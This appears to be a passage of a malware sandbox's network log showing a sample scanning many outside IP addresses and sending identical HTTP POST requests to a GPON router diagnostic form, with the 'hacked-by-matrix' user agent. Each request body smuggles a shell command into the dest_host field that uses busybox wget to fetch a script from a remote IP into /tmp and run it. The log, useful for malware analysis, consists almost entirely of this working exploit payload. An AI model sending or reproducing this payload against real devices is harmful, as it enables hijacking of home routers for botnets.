                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1677192.168.2.1353950109.185.37.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815176010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1678192.168.2.1347376109.184.116.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815207958 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1679192.168.2.13537885.89.72.236443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815211058 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1680192.168.2.1355370118.229.212.8443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815249920 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1681192.168.2.1358864109.57.37.112443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815278053 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1682192.168.2.13568805.67.179.101443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815288067 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1683192.168.2.134468042.12.151.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815301895 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1684192.168.2.13528965.150.97.169443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815326929 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1685192.168.2.13427925.218.144.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815331936 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1686192.168.2.1354902109.9.87.161443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815387964 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1687192.168.2.1335078118.169.72.243443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815407038 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1688192.168.2.134353442.101.163.104443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815422058 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1689192.168.2.1353772212.185.235.238443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815488100 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1690192.168.2.1333086109.81.163.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815504074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1691192.168.2.1357852118.207.205.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815515995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1692192.168.2.135823842.154.185.90443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815537930 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1693192.168.2.1360908118.223.187.108443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815593004 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1694192.168.2.135100042.89.217.248443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815607071 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1695192.168.2.135466442.203.5.210443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815610886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1696192.168.2.1351286109.218.160.6443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815630913 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1697192.168.2.13565505.44.49.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815651894 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1698192.168.2.13403385.69.163.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815684080 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1699192.168.2.1345018109.64.62.201443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815684080 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
